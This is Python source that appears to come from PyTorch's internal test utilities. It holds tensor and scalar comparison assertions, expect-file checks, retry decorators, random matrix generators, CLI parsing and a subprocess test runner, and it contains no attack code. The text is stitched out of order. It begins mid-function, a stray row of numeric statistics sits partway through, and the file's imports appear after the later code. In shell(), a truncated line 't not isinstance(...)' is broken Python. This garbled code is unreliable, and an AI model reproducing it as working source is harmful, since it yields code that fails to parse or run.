dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
atol = max(atol, self.precision)
return _compare_scalars_internal(a, b, rtol=cast(float, rtol), atol=cast(float, atol), equal_nan=equal_nan)
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified the other must be, too"
# Tensor x Number and Number x Tensor comparisons
if isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
super().assertEqual(x.is_sparse, y.is_sparse, msg=msg)
super().assertEqual(x.is_quantized, y.is_quantized, msg=msg)
if x.is_sparse:
x = self.safeCoalesce(x)
y = self.safeCoalesce(y)
indices_result, debug_msg = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor indices failed to compare as equal! " + debug_msg
self.assertTrue(indices_result, msg=msg)
values_result, debug_msg = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor values failed to compare as equal! " + debug_msg
self.assertTrue(values_result, msg=msg)
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Quantized representations failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
result, debug_msg = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Tensors failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
super().assertEqual(x, y, msg=msg)
elif type(x) == set and type(y) == set:
super().assertEqual(x, y, msg=msg)
elif isinstance(x, dict) and isinstance(y, dict):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
super().assertEqual(x, y, msg=msg)
elif is_iterable(x) and is_iterable(y):
super().assertEqual(len(x), len(y), msg=msg)
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
self.assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result and msg is None:
assert debug_msg is not None
msg = "Scalars failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
super().assertEqual(x, y, msg=msg)
def assertAlmostEqual(self, x, y, *, places=None, msg=None, delta=None):
prec = delta
if places:
prec = 10**(-places)
rtol = None if prec is None else 0
self.assertEqual(x, y, msg=msg, atol=prec, rtol=rtol)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def maybeWarnsRegex(self, category, regex=''):
"""Context manager for code that *may* warn, e.g. ``TORCH_WARN_ONCE``.
This filters expected warnings from the test log and fails the test if
any unexpected warnings are caught.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
# Ignore expected warnings
warnings.filterwarnings("ignore", message=regex, category=category)
try:
yield
finally:
if len(ws) != 0:
msg = 'Caught unexpected warnings:\n'
for w in ws:
msg += warnings.formatwarning(
w.message, w.category, w.filename, w.lineno, w.line)
msg += '\n'
self.fail(msg)
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
f.write(s)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id))
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "XXX"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
import subprocess
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
pipes = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
return pipes.communicate()[1].decode('ascii')
if sys.version_info < (3, 2):
# assertRegexpMatches renamed to assertRegex in 3.2
assertRegex = unittest.TestCase.assertRegexpMatches
# assertRaisesRegexp renamed to assertRaisesRegex in 3.2
assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
if sys.version_info < (3, 5):
# assertNotRegexpMatches renamed to assertNotRegex in 3.5
assertNotRegex = unittest.TestCase.assertNotRegexpMatches
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg)
def find_free_port():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
sockname = sock.getsockname()
sock.close()
return sockname[1]
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
matches exactly with one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
# Used in test_autograd.py and test_torch.py
def prod_single_zero(dim_size):
result = torch.randn(dim_size, dim_size)
result[0, 1] = 0
return result
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, v = A.svd()
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return u.mm(torch.diag(s)).mm(v.transpose(0, 1))
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1)).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1))
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1)) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
def make_nonzero_det(A, sign=None, min_singular_value=0.1):
u, s, v = A.svd()
s.clamp_(min=min_singular_value)
A = torch.matmul(u, torch.matmul(torch.diag_embed(s), v.transpose(-2, -1)))
det = A.det()
if sign is not None:
if A.dim() == 2:
det = det.item()
if (det < 0) ^ (sign < 0):
A[0, :].neg_()
else:
cond = ((det < 0) ^ (sign < 0)).nonzero()
if cond.size(0) > 0:
for i in range(cond.size(0)):
A[list(cond[i])][0, :].neg_()
return A
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, v = A.svd()
s = torch.arange(1., matrix_size + 1, dtype=dtype, device=device).mul_(1.0 / (matrix_size + 1)).diag()
return u.matmul(s.expand(batch_dims + (matrix_size, matrix_size)).matmul(v.transpose(-2, -1)))
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, v = A.svd(some=False)
s = torch.zeros(rows, columns, dtype=dtype, device=device)
k = min(rows, columns)
for i in range(k):
s[i, i] = float(i + 1) / (k + 1)
if singular:
# make matrix singular
s[k - 1, k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0, 0] = 0
return u.matmul(s.expand(batch_dims + (rows, columns)).matmul(v.transpose(-2, -1)))
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
A = torch.sparse_coo_tensor(indices, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices = [icoords, jcoords]
return torch.sparse_coo_tensor(indices, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs))
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
| 40.056911 | 124 | 0.625243 |
import sys
import os
import platform
import re
import gc
import types
from functools import partial
import inspect
import io
import argparse
import unittest
import warnings
import random
import contextlib
import socket
import subprocess
import time
from collections import OrderedDict
from contextlib import contextmanager
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
from urllib.request import urlopen
import __main__
import errno
from typing import cast, Any, Iterable, Optional
from torch.testing._internal import expecttest
from torch.testing import _compare_tensors_internal, _compare_scalars_internal, _compare_return_type
import torch
import torch.cuda
from torch._utils_internal import get_writable_path
from torch._six import string_classes
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
torch.backends.disable_global_flags()
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
torch._C.ScriptFunction.__call__ = prof_func_call
torch._C.ScriptMethod.__call__ = prof_meth_call
def _get_test_report_path():
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--ge_config', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if bool(os.environ.get('IN_CIRCLECI')) else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
args, remaining = parser.parse_known_args()
if args.ge_config == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.ge_config == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.ge_config == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
t not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
IS_PYTORCH_CI = bool(os.environ.get('IS_PYTORCH_CI'))
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
def run_tests(argv=UNITTEST_ARGS):
if TEST_DISCOVER:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
